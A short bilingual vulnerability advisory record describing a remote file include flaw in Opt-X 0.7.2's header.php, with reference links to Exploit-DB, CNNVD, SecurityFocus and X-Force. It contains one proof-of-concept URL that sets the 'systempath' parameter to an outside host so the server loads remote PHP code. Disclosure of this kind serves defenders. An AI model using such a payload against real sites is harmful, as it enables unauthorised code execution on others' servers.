https://www.exploit-db.com/exploits/23750
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1007

Opt-X0.7.2版本中header.php存在PHP远程文件列入漏洞。远程攻击者借助systempath参数执行任意PHP代码。

source: http://www.securityfocus.com/bid/9732/info

It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module.

Opt-X version 0.7.2 has been reported to be prone to this issue.

http://www.example.com/path_of_optx/includes/header.php?systempath=http://www.example.com/

来源:www.opt-x.org
链接:http://www.opt-x.org/index.php
来源:XF
名称:optx-header-file-include(15296)
链接:http://xforce.iss.net/xforce/xfdb/15296
来源:www.zone-h.org
链接:http://www.zone-h.org/en/advisories/read/id=4036/
来源:BID
名称:9732
链接:http://www.securityfocus.com/bid/9732